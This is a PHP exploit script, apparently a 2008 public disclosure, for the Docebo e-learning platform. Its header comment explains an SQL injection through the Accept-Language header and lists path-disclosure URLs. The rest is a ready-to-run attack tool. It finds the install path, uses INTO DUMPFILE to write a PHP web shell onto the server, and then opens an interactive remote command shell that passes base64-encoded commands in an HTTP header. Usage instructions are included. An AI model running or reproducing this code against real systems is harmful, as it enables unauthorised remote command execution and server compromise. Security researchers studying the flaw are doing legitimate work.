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Posted on 10 January 2008

<? /* ------------------------------------------------------------------- Docebo <= (lib.regset.php) Remote Command Execution Exploit ------------------------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.docebo.org/ details..: works with magic_quotes_gpc = off (if magic quotes affects also $_SERVER[] array) [-] autoDetectRegion() function vulnerable to SQL injection in /doceboCore/lib/lib.regset.php 781. function autoDetectRegion() { 782. 783. if(!isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])) { 784. $res=0; 785. return $res; 786. } 787. $accept_language=$_SERVER["HTTP_ACCEPT_LANGUAGE"]; 788. // [TODO] move the code that makes the accept language array to lib.utils 789. 790. $al_arr=explode(",", $accept_language); 791. 792. $i=0; 793. $res=""; 794. while(($res == "") && ($i < count($al_arr))) { 795. 796. $bl_arr=explode(";", $al_arr[$i]); 797. $browser_language=$bl_arr[0]; 798. 799. $qtxt="SELECT region_id FROM ".$this->_getListTable()." WHERE browsercode LIKE '%".$browser_language."%'"; <== 800. $q=$this->_executeQuery($qtxt); 801. 802. if (($q) && (mysql_num_rows($q) > 0)) { 803. $row=mysql_fetch_array($q); 804. $res=$row["region_id"]; 805. } an attacker cuold be inject SQL code through http accept-language header (in the query at line 799), but explode() function at line 790 will split the injected code by comma (","), so isn't possible even a blind SQL injection with BENCHMARK() method... this poc will try to inject some php code into docebo web directory by INTO DUMPFILE statement, this requires FILE privilege! [-] Path disclosure at: /doceboCore/class/class.conf_fw.php /doceboCore/class.module/class.event_manager.php /doceboCore/lib/lib.domxml5.php /doceboCore/menu/menu_over.php /doceboCms/class/class.conf_cms.php /doceboCms/lib/lib.compose.php /doceboCms/modules/chat/teleskill.php /doceboCms/class/class.admin_menu_cms.php */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print " [-] No response from {$host}:80 Trying again... "; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1); fclose($sock); return $resp; } function get_path() { global $host, $path; $packet = "GET {$path}../doceboCore/class/class.conf_fw.php HTTP/1.0 "; $packet.= "Host: {$host} "; $packet.= "Connection: close "; preg_match("/in <b>(.*)</b> on/i", http_send($host, $packet), $found); $ret = substr($found[1], 0, strlen($found[1]) - strlen(strstr($found[1], "docebo"))); $ret.= substr($path, 1); return $ret; } print " +------------------------------------------------------------+"; print " | Docebo <= Remote Command Execution Exploit by EgiX |"; print " +------------------------------------------------------------+ "; if ($argc < 3) { print " Usage....: php $argv[0] host path "; print " host.....: target server (ip/hostname)"; print " path.....: path to docebo directory "; print " Example..: php $argv[0] localhost /doceboCms/"; print " Example..: php $argv[0] localhost /docebo/doceboLms/ "; die(); } $host = $argv[1]; $path = $argv[2]; $r_path = str_replace("\", "/", get_path()); // replace "" for windows path $r_file = md5(time()).".php"; print " [-] Path disclosure: {$r_path} [-] Trying to inject php shell... "; $code = "<?php ${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?>"; $packet = "GET {$path} HTTP/1.0 "; $packet.= "Host: {$host} "; $packet.= "Accept-Language: %'/**/AND/**/1=0/**/UNION/**/SELECT/**/'{$code}'/**/INTO/**/DUMPFILE/**/'{$r_path}{$r_file}'/* "; $packet.= "Connection: close "; $html = http_send($host, $packet); $packet = "GET {$path}{$r_file} HTTP/1.0 "; $packet.= "Host: {$host} "; $packet.= "Connection: close "; $html = http_send($host, $packet); if (!ereg("_code_", $html)) die(" [-] Exploit failed... "); else print "[-] Shell injected! Starting it... "; define(STDIN, fopen("php://stdin", "r")); while(1) { print " xpl0it-sh3ll > "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $packet = "GET {$path}{$r_file} HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cmd: ".base64_encode($cmd)." "; $packet .= "Connection: close "; $html = http_send($host, $packet); if (!ereg("_code_", $html)) die(" [-] Exploit failed... "); $shell = explode("_code_", $html); print " ".$shell[1]; } else break; } ?>